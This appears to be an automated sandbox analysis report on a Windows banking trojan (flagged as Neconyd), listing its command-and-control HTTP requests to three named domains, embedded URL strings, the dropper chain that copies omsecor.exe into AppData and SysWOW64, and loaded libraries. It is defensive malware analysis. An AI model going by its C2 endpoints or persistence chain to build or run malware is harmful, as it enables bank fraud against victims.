Source: global traffic	HTTP traffic detected: GET /978/939.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /292/164.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473503\|1730473447\|16\|4\|0
Source: global traffic	HTTP traffic detected: GET /263/482.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /908/776.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /785/70.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /763/794.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473522\|1730473447\|17\|5\|0
Source: global traffic	HTTP traffic detected: GET /734/112.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /562/252.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /488/933.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /776/947.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473541\|1730473447\|18\|6\|0

Source: global traffic	DNS traffic detected: DNS query: lousta.net
Source: global traffic	DNS traffic detected: DNS query: mkkuei4kdsz.com
Source: global traffic	DNS traffic detected: DNS query: ow5dirasuek.com

Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.ne
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/263/482.html
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/263/482.html3
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/333/645.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/497/157.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/497/157.htmlB
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/508/485.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/527/338.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/528/262.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/528/262.html9Tk-.
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/547/467.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/547/467.html4Wx
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.html.
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlB
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlY
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlaba
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/734/112.html
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/734/112.htmlk
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/740/238.html
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/740/238.htmlx
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/78/665.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/78/665.htmlH
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/875/87.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.htmlFTv-1
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.htmla0
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.html0473447
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.htmlw
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/353/421.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/353/421.html$E
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html-559bf06f72796be679
Source: omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html~
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmlasuek.com
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmldZI-&
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmlom
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html&
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html0
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.htmlwLt
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html)
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html4
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/785/70.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/8.htmlshqos.dll.mui
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/978/939.html
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.html.E
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.htmlam
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/434/722.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.html;Q
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.htmlwm
Source: omsecor.exe, 00000001.00000002.1883206861.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html#L
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html$
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html5L
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html;L
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlD
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlULV
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.html6Z
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.htmlZZ
Source: omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlPZ
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlnZ
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlrZC-
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2259943860.0000000000194000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html/
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html3
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html7
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlA
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlN
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlasuek.com
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/en-GB
Source: bd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.dr	String found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
Source: omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/p

E-Banking Fraud

Yara detected Neconyd

Source: Yara match	File source: Process Memory Space: bd0wJGTae5.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 6792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 764, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\omsecor.exe	File created: C:\Windows\SysWOW64\omsecor.exe			Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	File created: C:\Windows\SysWOW64\merocz.xc6			Jump to behavior

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00401C41	0_2_00401C41
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040D2A4	0_2_0040D2A4
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040B51C	0_2_0040B51C
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040CBD0	0_2_0040CBD0
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00401C41	2_2_00401C41
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040D2A4	2_2_0040D2A4
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040B51C	2_2_0040B51C
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040CBD0	2_2_0040CBD0

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: String function: 00405511 appears 56 times
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 00405511 appears 56 times

Source: bd0wJGTae5.exe

Static PE information: invalid certificate

Source: bd0wJGTae5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@7/3@3/3

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,

0_2_0040A057

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

File created: C:\Users\user\AppData\Roaming\omsecor.exe

Jump to behavior

Source: bd0wJGTae5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bd0wJGTae5.exe

ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

File read: C:\Users\user\Desktop\bd0wJGTae5.exe

Jump to behavior

Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess			graph_2-5750
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess			graph_0-5749

Source: unknown	Process created: C:\Users\user\Desktop\bd0wJGTae5.exe "C:\Users\user\Desktop\bd0wJGTae5.exe"
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove	Jump to behavior

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\omsecor.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004032B8

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040D293 push ecx; ret	0_2_0040D2A3
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040CBB5 push ecx; ret	0_2_0040CBC8
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040D293 push ecx; ret	2_2_0040D2A3
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040CBB5 push ecx; ret	2_2_0040CBC8

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\omsecor.exe

Executable created and started: C:\Windows\SysWOW64\omsecor.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\omsecor.exe	File created: C:\Windows\SysWOW64\omsecor.exe			Jump to dropped file
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	File created: C:\Users\user\AppData\Roaming\omsecor.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\omsecor.exe

File created: C:\Windows\SysWOW64\omsecor.exe

Jump to dropped file

